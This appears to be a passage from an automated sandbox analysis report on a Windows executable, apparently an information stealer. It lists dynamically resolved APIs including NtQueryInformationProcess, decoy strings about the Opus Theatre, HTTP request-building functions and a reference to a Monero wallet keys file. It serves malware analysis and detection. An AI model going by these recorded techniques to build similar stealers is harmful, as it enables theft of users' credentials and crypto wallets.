48a8a0 lstrcpy 16204->16205 16206 480294 16205->16206 16207 48a9b0 4 API calls 16206->16207 16208 4802b8 16207->16208 16209 48a8a0 lstrcpy 16208->16209 16265 47988e 16264->16265 16268 476fb0 16265->16268 16267 4798ad ctype 16267->16024 16271 476d40 16268->16271 16272 476d63 16271->16272 16280 476d59 16271->16280 16272->16280 16285 476660 16272->16285 16274 476dbe 16274->16280 16291 4769b0 16274->16291 16276 476e2a 16277 476ee6 VirtualFree 16276->16277 16279 476ef7 16276->16279 16276->16280 16277->16279 16278 476f41 16278->16280 16283 4889f0 2 API calls 16278->16283 16279->16278 16281 476f26 FreeLibrary 16279->16281 16282 476f38 16279->16282 16280->16267 16281->16279 16284 4889f0 2 API calls 16282->16284 16283->16280 16284->16278 16290 47668f VirtualAlloc 16285->16290 16287 476730 16288 476743 VirtualAlloc 16287->16288 16289 47673c 16287->16289 16288->16289 16289->16274 16290->16287 16290->16289 16292 4769c9 16291->16292 16297 4769d5 16291->16297 16293 476a09 LoadLibraryA 16292->16293 16292->16297 16294 476a32 16293->16294 16293->16297 16295 476ae0 16294->16295 16301 488a10 GetProcessHeap RtlAllocateHeap 16294->16301 16295->16297 16298 476ba8 GetProcAddress 16295->16298 16297->16276 16298->16295 16298->16297 16299 4889f0 2 API calls 16299->16295 16300 476a8b 16300->16297 16300->16299 16301->16300

                    Executed Functions

                    Function 00489860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 660 489860-489874 call 489750 663 48987a-489a8e call 489780 GetProcAddress * 21 660->663 664 489a93-489af2 LoadLibraryA * 5 660->664 663->664 665 489b0d-489b14 664->665 666 489af4-489b08 GetProcAddress 664->666 668 489b46-489b4d 665->668 669 489b16-489b41 GetProcAddress * 2 665->669 666->665 671 489b68-489b6f 668->671 672 489b4f-489b63 GetProcAddress 668->672 669->668 673 489b89-489b90 671->673 674 489b71-489b84 GetProcAddress 671->674 672->671 675 489bc1-489bc2 673->675 676 489b92-489bbc GetProcAddress * 2 673->676 674->673 676->675
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01232290), ref: 004898A1
                    • GetProcAddress.KERNEL32(74DD0000,01232188), ref: 004898BA
                    • GetProcAddress.KERNEL32(74DD0000,01232230), ref: 004898D2
                    • GetProcAddress.KERNEL32(74DD0000,012321B8), ref: 004898EA
                    • GetProcAddress.KERNEL32(74DD0000,012321E8), ref: 00489903
                    • GetProcAddress.KERNEL32(74DD0000,012391E0), ref: 0048991B
                    • GetProcAddress.KERNEL32(74DD0000,01225570), ref: 00489933
                    • GetProcAddress.KERNEL32(74DD0000,012255B0), ref: 0048994C
                    • GetProcAddress.KERNEL32(74DD0000,012322C0), ref: 00489964
                    • GetProcAddress.KERNEL32(74DD0000,012322A8), ref: 0048997C
                    • GetProcAddress.KERNEL32(74DD0000,01232308), ref: 00489995
                    • GetProcAddress.KERNEL32(74DD0000,012323F8), ref: 004899AD
                    • GetProcAddress.KERNEL32(74DD0000,012254D0), ref: 004899C5
                    • GetProcAddress.KERNEL32(74DD0000,01232428), ref: 004899DE
                    • GetProcAddress.KERNEL32(74DD0000,01232440), ref: 004899F6
                    • GetProcAddress.KERNEL32(74DD0000,012253F0), ref: 00489A0E
                    • GetProcAddress.KERNEL32(74DD0000,01232248), ref: 00489A27
                    • GetProcAddress.KERNEL32(74DD0000,01232320), ref: 00489A3F
                    • GetProcAddress.KERNEL32(74DD0000,012254B0), ref: 00489A57
                    • GetProcAddress.KERNEL32(74DD0000,01232200), ref: 00489A70
                    • GetProcAddress.KERNEL32(74DD0000,01225270), ref: 00489A88
                    • LoadLibraryA.KERNEL32(01232470,?,00486A00), ref: 00489A9A
                    • LoadLibraryA.KERNEL32(012324B8,?,00486A00), ref: 00489AAB
                    • LoadLibraryA.KERNEL32(012324E8,?,00486A00), ref: 00489ABD
                    • LoadLibraryA.KERNEL32(012324D0,?,00486A00), ref: 00489ACF
                    • LoadLibraryA.KERNEL32(01232500,?,00486A00), ref: 00489AE0
                    • GetProcAddress.KERNEL32(75A70000,01232518), ref: 00489B02
                    • GetProcAddress.KERNEL32(75290000,01232488), ref: 00489B23
                    • GetProcAddress.KERNEL32(75290000,012324A0), ref: 00489B3B
                    • GetProcAddress.KERNEL32(75BD0000,01232530), ref: 00489B5D
                    • GetProcAddress.KERNEL32(75450000,01225330), ref: 00489B7E
                    • GetProcAddress.KERNEL32(76E90000,012391F0), ref: 00489B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00489BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00489BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: a8632c72287aa06a86cf23377a60eec1dce716b2093f76b9c3348ec54fa90702
                    • Instruction ID: 0980ea8ad3a16c80a65ccc6a8327482f3a3ecb070e0abfa151afcd480a9c68a3
                    • Opcode Fuzzy Hash: a8632c72287aa06a86cf23377a60eec1dce716b2093f76b9c3348ec54fa90702
                    • Instruction Fuzzy Hash: D2A14EF9514240AFD354EFE8ED889A637FBF74C301754672AE605C3664DA3A98C1CB12
                    Function 004745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 764 4745c0-474695 RtlAllocateHeap 781 4746a0-4746a6 764->781 782 47474f-4747a9 VirtualProtect 781->782 783 4746ac-47474a 781->783 783->781
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0047460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0047479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474729
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474683
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: c366365fbd4c20552f9db844f20ae531f2198c9141a68cf1602123f3fb2437e1
                    • Instruction ID: 0a9631802d410b619af4c19055ccc44c977520a5aa900cf921c791c692d2fc5f
                    • Opcode Fuzzy Hash: c366365fbd4c20552f9db844f20ae531f2198c9141a68cf1602123f3fb2437e1
                    • Instruction Fuzzy Hash: A04124606C2A046EEF35B7A58C46FDE7A52DFC3748F705072A8C452390CFB86506C7AA
                    Function 00474880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 801 474880-474942 call 48a7a0 call 4747b0 call 48a740 * 5 InternetOpenA StrCmpCA 816 474944 801->816 817 47494b-47494f 801->817 816->817 818 474955-474acd call 488b60 call 48a920 call 48a8a0 call 48a800 * 2 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a920 call 48a8a0 call 48a800 * 2 InternetConnectA 817->818 819 474ecb-474ef3 InternetCloseHandle call 48aad0 call 479ac0 817->819 818->819 905 474ad3-474ad7 818->905 829 474ef5-474f2d call 48a820 call 48a9b0 call 48a8a0 call 48a800 819->829 830 474f32-474fa2 call 488990 * 2 call 48a7a0 call 48a800 * 8 819->830 829->830 906 474ae5 905->906 907 474ad9-474ae3 905->907 908 474aef-474b22 HttpOpenRequestA 906->908 907->908 909 474ebe-474ec5 InternetCloseHandle 908->909 910 474b28-474e28 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a9b0 call 48a8a0 call 48a800 call 48a920 call 48a8a0 call 48a800 call 48a740 call 48a920 * 2 call 48a8a0 call 48a800 * 2 call 48aad0 lstrlen call 48aad0 * 2 lstrlen call 48aad0 HttpSendRequestA 908->910 909->819 1021 474e32-474e5c InternetReadFile 910->1021 1022 474e67-474eb9 InternetCloseHandle call 48a800 1021->1022 1023 474e5e-474e65 1021->1023 1022->909 1023->1022 1024 474e69-474ea7 call 48a9b0 call 48a8a0 call 48a800 1023->1024 1024->1021
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00474915
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 0047493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00474ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00490DDB,00000000,?,?,00000000,?,",00000000,?,0123E908), ref: 00474DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00474E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00474E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00474E49
                    • InternetCloseHandle.WININET(00000000), ref: 00474EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00474EC5
                    • HttpOpenRequestA.WININET(00000000,0123E778,?,0123E298,00000000,00000000,00400100,00000000), ref: 00474B15
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • InternetCloseHandle.WININET(00000000), ref: 00474ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: 63ee73a71b5f758b3ac8ffa0a6184976ae510e81df16d225440cbeb806c22ad6
                    • Instruction ID: 5a3fc47f830fac519a9ee9adc9cf6de0dab9a369f537e76f1d4ff80e5a9c74cb
                    • Opcode Fuzzy Hash: 63ee73a71b5f758b3ac8ffa0a6184976ae510e81df16d225440cbeb806c22ad6
                    • Instruction Fuzzy Hash: 8412FD71910118AAEB15FB91DC92FEEB339AF14304F50459FB10662091DFB82F99CB7A
                    Function 00487850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: f5883007d09a8cfe8b3b1c7a53b851b7d3f667180ece71d9f8d60bffe1476838
                    • Instruction ID: 8ba8c793ab7cf6ab3ee7c00d29def371284b3271a8e5ef7d4347b829d8c40e9a
                    • Opcode Fuzzy Hash: f5883007d09a8cfe8b3b1c7a53b851b7d3f667180ece71d9f8d60bffe1476838
                    • Instruction Fuzzy Hash: D4F04FF1D44208ABC700DFD8DD49FAEBBB8EB04711F10065AFA05A2680C77855448BA2
                    Function 00471160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 1bcb3eeecc75703b25311057ad42369840053a71a9c91bfdad1cfaf8942cfbdb
                    • Instruction ID: ad3eddc768c8144dc9721f47ce6e612fc97f9ea57b03240fe03f72d4723a15a7
                    • Opcode Fuzzy Hash: 1bcb3eeecc75703b25311057ad42369840053a71a9c91bfdad1cfaf8942cfbdb
